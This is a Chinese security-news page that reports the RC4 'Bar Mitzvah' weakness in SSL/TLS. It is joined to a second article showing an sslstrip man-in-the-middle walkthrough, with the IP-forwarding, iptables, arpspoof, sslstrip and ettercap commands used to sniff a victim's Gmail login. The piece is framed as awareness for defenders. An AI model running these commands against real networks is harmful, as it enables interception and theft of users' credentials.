受诫礼攻击:SSL/TLS又曝新漏洞,可明文读取传输数据-中国学网-中国IT综合门户网站-提供健康,养生,留学,移民,创业,汽车等信息
受诫礼攻击:SSL/TLS又曝新漏洞,可明文读取传输数据
来源:互联网 更新时间: 22:25:13 责任编辑:王亮字体:
SSL/TLS协议是一个被广泛使用的加密协议,而研究人员近日了曝出一个名为&受诫礼&的新型攻击手段,能够窃取通过SSL和TLS协议传输的机密数据,诸如银行卡号码,密码和其他敏感信息。
这种攻击利用了一个RC4加密算法中的一个长达13年的漏洞。众所周知RC4算法不怎么安全,但事实让人大跌眼镜&&互联网上30%的TLS流量加密使用的都是RC4算法。受诫礼(BAR-MITZVAH)攻击
这种攻击方法被取名为&受诫礼(Bar-Mitzvah)&,与之前多数的SSL攻击手段不同,这种攻击甚至不需要在客户端和服务器间实施中间人攻击。
安全公司Imperva的研究员Itsik Mantin周四在新加坡举行的Black Hat亚洲安全会议上展示了他的研究,题为《对使用RC4算法的SSL进行攻击》。
Bar Mitzvah攻击实际上是利用了&不变性漏洞&,这是RC4算法中的一个缺陷,它能够在某些情况下泄露SSL/TLS加密流量中的密文,从而将账户用户名密码,信用卡数据和其他敏感信息泄露给黑客。
研究人员在其报告中写道:
&RC4算法的安全性已经被质疑了很多年了,特别是它的初始化机制。但是,直到最近几年我们才呼吁弃用RC4。这次的研究中,我们跟进2013年RC4的研究,并且发现它对于很多使用了RC4的系统上的已知漏洞的影响很显然被低估了。&
Bar Mitzvah攻击是首个仅仅需要被动嗅探和***SSL/TLS连接就可以进行攻击的方法,它不需要中间人攻击。不过研究人员称,要劫持会话可能还是要用到中间人攻击。安全建议
在等候&RC4全面废弃&的同时,管理员们也应该考虑如下的步骤防止这类的攻击:
1、Web应用管理员们应该在应用TLS配置中禁止RC4
2、Web用户(特别是超级用户组)应该在浏览器TLS配置中禁止RC4
3、浏览器厂家应该考虑移除RC4的支持。
SSL漏洞&高发季&
过去一年,SSL协议中多个重大漏洞被爆出,包括BEAST, POODLE和CRIME。
相关文章:
被攻击者需要选择是否信任***,可以看到伪造的***信息与上图中真实***还是有很大的区别的。
498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 494 height: 334px" src="/files/uploadimg/6011.jpg" alt="" />
498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 500 height: 324px" src="/files/uploadimg/6012.jpg" alt="" />
登陆邮箱后的画面,可以看到***错误的提示依然是很醒目的。
498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 501 height: 316px" src="/files/uploadimg/6013.jpg" alt="" />
攻击者已成功嗅探到Gmail邮箱的登陆用户名和密码。
498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 494 height: 127px" src="/files/uploadimg/6014.jpg" alt="" />
通过以上分析可以发现,用户对于伪造***的判断是攻击能否成功的关键,如果用户有着较强的安全意识和丰富的网络知识那么被攻击的可能性将大大降低,毕竟浏览器中的安全提示还是非常醒目的。笔者相信随着网络知识的不断普及,这种攻击手段的生存空间会不断被挤压。
Cain & Abel虽然能实现SSL攻击,但是伪造***的局限性还是很明显的, sslstrip是在09年黑帽大会上由Moxie Marlinspike提出的一种针对SSL攻击的方法,其思想非常简单:
ARP欺骗,使得攻击者能截获所有目标主机的网络流量;
攻击者利用用户对于地址栏中HTTPS与HTTP的疏忽,将所有的HTTPS连接都用HTTP来代替;
同时,与目标服务器建立正常的HTTPS连接;
由于HTTP通信是明文传输,攻击者能轻松实施嗅探。
笔者将采用BackTrack作为攻击平台,BackTrack是基于Linux的一套渗透测试工具包,目前,国内各大论坛有很多关于使用BackTrack来进行无线wifi密码破解的教程,其实它在其他领域也有着极其强大的功能。
步骤一:启用内核包转发,修改/proc/sys/net/ipv4/ip_forward文件,内容为1;
# echo 1 & /proc/sys/net/ipv4/ip_forward步骤二:端口转发,10000为sslstrip的***端口;
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
步骤三:shell1,ARP欺骗;
# arpspoof -i eth0 -t 192.168.18.100 192.168.18.254
498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 484 display: height: 357px" src="/files/uploadimg/6015.jpg" jquery" alt="" />
步骤四:shell2,开启sslstrip;
# sslstrip -a -k -f&img wp-image-2530&=&& height=&499& data-cke-saved-src=/files/uploadimg/6016.jpg& src=/files/uploadimg/6016.jpg&&
步骤五:嗅探得到登陆Gmail邮箱的用户名和密码;
# ettercap -T -q -i eth0
498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 499 display: height: 403px" src="/files/uploadimg/6018.jpg" jquery" alt="" />
那么这种方法是否是万能的呢,下面就来看看被攻击者浏览器的变化。
498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 497 height: 334px" src="/files/uploadimg/6019.jpg" alt="" />
可以看到,网页上没有任何不安全的警告或是提示,只是原先的HTTPS连接已经被HTTP连接所替换,并且为增加迷惑性,网页的图标被修改成了一个银色的锁图案。但是,假的毕竟是假的,一方面无法查看到任何***的信息,另外如果在网址前输入https://,则网页无法发开。因此,sslstrip并不是万能的攻击方法。
本文的目的主要是想告诉读者,网络安全技术日新月异的同时,攻击方法也在悄然发生着变化,采用了SSL加密通信并不一定能保证通信的隐密性和完整性,为此,笔者展示了两种SSL的中间人攻击方法,前者是常规思路,后者则另辟蹊径。希望今后大家能提高警惕,准确辨识你的通信是否正遭到攻击,尤其是在完成重要操作时,如网银交易等。【编辑推荐】【责任编辑: TEL:(010)】
关于&&的更多文章
SSL ***是解决远程用户访问敏感公司数据最简单最安全的解决技术
随着云计算、物联网、大数据、移动互联网的大发展,你应该知道这些。
万兆网络并不仅仅意味着网络带宽的增加,与之相匹配
美国前CIA雇员斯诺登日前揭露美国政府的监视行为,也
本专题为中小企业推荐十款能够帮助企业缩减开支的免费
Linux主要用于架设网络服务器。如今关于服务器和网站被黑客攻击的报告几乎每天都可以见到,而且随着网络应用的丰富多样,攻击的
51CTO旗下网站